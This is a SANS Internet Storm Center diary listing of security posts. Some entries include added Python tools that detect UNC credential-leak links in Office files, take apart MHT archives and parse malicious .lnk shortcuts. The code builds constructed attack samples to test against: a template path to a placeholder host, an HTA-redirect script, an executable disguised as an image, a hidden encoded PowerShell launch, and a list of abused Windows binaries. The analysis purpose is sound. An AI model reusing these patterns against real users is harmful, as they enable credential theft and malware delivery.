SANS Internet Storm Center

SANS Internet Storm Center - Cooperative Cyber Security Monitor

Certificates Revisited - SSL VPN Certificates 2 Ways, (Wed, Sep 19th)

Wed, 09/19/2018 - 7:30am
As a consultant that does lots of network "stuff", I tend to build SSL VPN access for lots of clients.  And a few times per year, I get the "our certificate has just expired" call from one client or another.

Using Certificate Transparency as an Attack / Defense Tool, (Tue, Sep 18th)

Tue, 09/18/2018 - 6:00am
Certificate Transparency is a program that we've all heard about, but might not have had direct contact with. We do hear about it from time to time, for instance when Google (or someone else) busts a CA for generating certificates that should not exist (which is what eventually led to the Symantec CA implosion event...). I kinda knew about it mostly from mentions in the ISC Stormcast.

Dissecting Malicious MS Office Docs, (Mon, Sep 17th)

Mon, 09/17/2018 - 7:32am
Looking back at the story I posted 2 weeks back, on getting target users to leak credentials using malicious UNC links in Office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ) - how would you actually identify a malicious document of this type? After a bit of digging, it turns out that there are a few ways to do this.
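One place to look is the OOXML package itself: a Word document that reaches out to a UNC path on open carries that path in a relationship with TargetMode="External" (for example an attachedTemplate in word/_rels/settings.xml.rels) or inside a field code. The scanner below is an added example for this diary listing, not code from the ISC diary; it builds a constructed sample DOCX in memory (the host 192.0.2.10 and the file names are made up) and then walks every .rels part and every instrText field looking for UNC or file: targets.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# A target of this shape makes Word resolve a remote path (SMB/WebDAV) when the
# document opens, which is what leaks the NTLM handshake.
UNC_RE = re.compile(r"^(\\\\|//|file:)", re.IGNORECASE)


def build_sample_docx(template_target):
    """Constructed sample, not a captured file: a minimal DOCX whose
    settings.xml.rels points the attached template at `template_target`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Invoice</w:t>'
                   '</w:r></w:p></w:body></w:document>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                   f'Type="{R_NS}/attachedTemplate" Target="{template_target}" '
                   'TargetMode="External"/></Relationships>')
        # A benign external hyperlink, to show that External alone is not the signal.
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId2" '
                   f'Type="{R_NS}/hyperlink" Target="https://www.example.com/" '
                   'TargetMode="External"/></Relationships>')
    return buf.getvalue()


def find_external_unc_targets(docx_bytes):
    """Scan every *.rels part for external relationships whose target is a UNC
    or file: path. Returns (rels_part, relationship_type, target) tuples."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and UNC_RE.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


def find_unc_field_codes(docx_bytes):
    """Second vector: field instructions (INCLUDEPICTURE, INCLUDETEXT, ...)
    that embed a UNC path directly in word/*.xml. Returns (part, field_text)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            for instr in root.iter(f"{{{W_NS}}}instrText"):
                text = instr.text or ""
                if "\\\\" in text or "file:" in text.lower():
                    hits.append((name, text.strip()))
    return hits


if __name__ == "__main__":
    sample = build_sample_docx(r"\\192.0.2.10\share\invoice.dotx")
    for hit in find_external_unc_targets(sample):
        print("external UNC relationship:", hit)
    for hit in find_unc_field_codes(sample):
        print("UNC in field code:", hit)
```

The same check applies to any OOXML container (xlsx, pptx); only the part names differ. Legacy binary .doc files need an OLE parser instead, since the template path lives in the document's property streams rather than in a relationships part.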

20/20 malware vision, (Sun, Sep 16th)

Sun, 09/16/2018 - 1:29pm
In his diary entry "Malware Delivered Through MHT Files", Xavier shows some malicious VBA code with obfuscated strings.

User Agent String "$ua.tools.random()" ? :-) !, (Sat, Sep 15th)

Sat, 09/15/2018 - 12:43pm
For many years I've observed requests for page license.php on my webservers, from various IPs and with various User Agent Strings:

Sextortion - Follow the Money Update, (Fri, Sep 14th)

Fri, 09/14/2018 - 3:37pm
This diary is an update to Sextortion - Follow the Money, which tracks some of the BTC addresses related to the Sextortion campaign still in the wild, but seemingly tailing off at this time.

Malware Delivered Through MHT Files, (Thu, Sep 13th)

Thu, 09/13/2018 - 12:30am
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful for archiving. Also called MHTML[1] (MIME Encapsulation of Aggregate HTML Documents), they are encoded like email messages using MIME parts.
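Because an MHT file is just a multipart/related MIME message, the standard library's email parser is enough to take one apart without opening it in a browser or Word. The inventory script below is an added example, not code from the diary: it builds a constructed MHT in memory (the invoice.example hostname, the script and the embedded bytes are all made up), decodes each part from its quoted-printable or base64 transfer encoding, and flags parts whose real content (by magic bytes) disagrees with what the headers claim.

```python
import base64
import email

# Constructed sample (not the file from the diary): an HTML part with a script,
# plus a part declared as a PNG whose base64 body decodes to a PE header.
_BOUNDARY = "----MultipartBoundary--sample----"
_PE_STUB_B64 = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()

SAMPLE_MHT = (
    "From: <Saved by Blink>\r\n"
    "Subject: Invoice 2018-09\r\n"
    "MIME-Version: 1.0\r\n"
    f'Content-Type: multipart/related; type="text/html"; boundary="{_BOUNDARY}"\r\n'
    "\r\n"
    f"--{_BOUNDARY}\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "Content-Location: http://invoice.example/index.html\r\n"
    "\r\n"
    "<html><body><h1>Invoice</h1>\r\n"
    '<script>document.location=3D"http://invoice.example/payload.hta"</script>\r\n'
    "</body></html>\r\n"
    f"--{_BOUNDARY}\r\n"
    "Content-Type: image/png\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "Content-Location: http://invoice.example/logo.png\r\n"
    "\r\n"
    f"{_PE_STUB_B64}\r\n"
    f"--{_BOUNDARY}--\r\n"
).encode()

# Magic bytes worth knowing about inside a "web page archive".
MAGIC = {
    b"MZ": "PE executable",
    b"\xd0\xcf\x11\xe0": "OLE compound file (legacy Office document)",
    b"PK\x03\x04": "ZIP container (OOXML or archive)",
}


def inventory(mht_bytes):
    """Walk every leaf MIME part and describe it: declared type and location,
    transfer encoding, decoded size and the file type the bytes actually are."""
    msg = email.message_from_bytes(mht_bytes)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""  # undoes QP / base64
        magic = next((label for sig, label in MAGIC.items()
                      if payload.startswith(sig)), None)
        parts.append({
            "content_type": part.get_content_type(),
            "location": part.get("Content-Location"),
            "encoding": part.get("Content-Transfer-Encoding"),
            "size": len(payload),
            "magic": magic,
            "payload": payload,
        })
    return parts


def findings(parts):
    """What an analyst wants to see first: script in the HTML, and binaries
    hiding behind an innocuous content type."""
    out = []
    for p in parts:
        if p["content_type"] == "text/html" and b"<script" in p["payload"].lower():
            out.append(f"script in HTML part {p['location']}")
        if p["magic"]:
            out.append(f"{p['magic']} declared as {p['content_type']} at {p['location']}")
    return out


if __name__ == "__main__":
    parts = inventory(SAMPLE_MHT)
    for p in parts:
        print(f"{p['content_type']:<24} {p['encoding']:<18} {p['size']:>6} B  {p['location']}")
    for f in findings(parts):
        print("!!", f)
```

Write each decoded payload to disk (for example with the Content-Location basename) and the Office parts can be handed to the usual OLE/VBA tooling; the point here is that the MIME layer hides nothing once the transfer encoding is removed.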

So What is Going on With IPv4 Fragments these Days?, (Wed, Sep 12th)

Wed, 09/12/2018 - 1:47pm
[Disclaimer: This article deals with legacy IPv4 networks. IPv6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]

Microsoft September Patch Tuesday Summary, (Tue, Sep 11th)

Tue, 09/11/2018 - 12:31pm
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.

"What is dikona or glirote3?", (Mon, Sep 10th)

Mon, 09/10/2018 - 12:31pm
Reader Matt was targeted with malware via email, and managed to start to analyze the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:
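The safe way to find out what a .lnk launches is to read the ShellLink structure rather than double-click it: the relative path, working directory and command-line arguments are length-prefixed strings that follow the 76-byte header (and the optional target ID list and LinkInfo blocks). The parser below is an added example for this listing, not Matt's or the ISC's code; since the command from the diary is not reproduced here, it builds its own constructed .lnk whose PowerShell arguments carry an -EncodedCommand of a harmless string, then extracts and decodes them.

```python
import base64
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7
SUSPICIOUS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
              "rundll32", "regsvr32", "certutil")


def build_sample_lnk(relative_path, arguments, working_dir="."):
    """Constructed sample shortcut (not the one from the diary): header plus
    StringData only, no ID list or LinkInfo, window opened minimized."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, working_dir, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return show_command plus whichever StringData fields the file carries."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        size, = struct.unpack_from("<I", data, off)
        off += size
    info = {"show_command": show_cmd}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return info


def decode_encoded_command(arguments):
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-enc, -e...);
    return the decoded UTF-16LE script if one is present, else None."""
    toks = arguments.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(info):
    """Human-readable reasons this shortcut deserves a closer look."""
    reasons = []
    text = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    reasons += [f"launches {t}" for t in SUSPICIOUS if t in text]
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=7: window opens minimized (hides the console)")
    decoded = decode_encoded_command(info.get("arguments", ""))
    if decoded is not None:
        reasons.append(f"-EncodedCommand decodes to: {decoded!r}")
    return reasons


if __name__ == "__main__":
    enc = base64.b64encode("Write-Host hi".encode("utf-16-le")).decode()
    lnk = build_sample_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                           f"-NoProfile -WindowStyle Hidden -enc {enc}")
    info = parse_lnk(lnk)
    print(info)
    for r in triage(info):
        print("!!", r)
```

Real shortcuts usually do have a LinkTargetIDList and LinkInfo block, which is why the parser skips them by their own size fields; what it does not do is follow the ExtraData blocks after StringData, where an EnvironmentVariableDataBlock can carry a second copy of the target.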

Video: Using scdbg to analyze shellcode, (Sat, Sep 8th)

Sat, 09/08/2018 - 5:08pm
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse tcp shell, by setting up a server listening on the appropriate TCP port.
